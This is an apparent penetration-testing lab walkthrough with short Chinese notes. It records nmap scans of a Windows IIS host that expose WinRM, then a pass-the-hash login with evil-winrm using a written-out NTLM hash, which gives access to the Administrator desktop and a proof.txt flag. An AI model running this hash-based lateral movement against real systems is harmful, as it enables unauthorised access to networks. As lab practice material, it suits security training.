nmap -sT -Pn -A 192.168.64.169
Nmap scan report for 192.168.64.169
Host is up (0.22s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows Server
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 2 IP addresses (2 hosts up) scanned in 207.40 seconds
从内部扫描看看:
root@web05:/home# ./run-nmap.sh -Pn -A -p- 172.16.64.254
Starting Nmap 7.91SVN ( <https://nmap.org> ) at 2022-08-01 06:05 EDT
Nmap scan report for 172.16.64.254
Host is up (0.00026s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
3128/tcp open http-proxy Squid http proxy 3.5.28
|_http-server-header: squid/3.5.28
|_http-title: ERROR: The requested URL could not be retrieved
**5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)**
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49670/tcp open msrpc Microsoft Windows RPC
MAC Address: 00:50:56:86:39:F9 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE
HOP RTT ADDRESS
1 0.26 ms 172.16.64.254
OS and Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 174.97 seconds
用peta
的hash
进行登录:
┌──(kali㉿kali)-[~/Documents/osep/tools]
└─$ **evil-winrm -u ops.comply.com\\\\pete -H 6db6cfdf45964a02a80e85a7ab9f4314 -i 172.16.64.254**
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: <https://github.com/Hackplayers/evil-winrm#Remote-path-completion>
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\\Users\\pete\\Documents> cd c:\\Users\\Administrator\\Desktop
*Evil-WinRM* PS C:\\Users\\Administrator\\Desktop> more proof.txt
**5d725dccc25c82f36f0d9428096c5b6e**
*Evil-WinRM* PS C:\\Users\\Administrator\\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.64.169
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.64.254
Ethernet adapter Ethernet1:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 172.16.64.254
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
*Evil-WinRM* PS C:\\Users\\Administrator\\Desktop> hostname
proxy01
*Evil-WinRM* PS C:\\Users\\Administrator\\Desktop>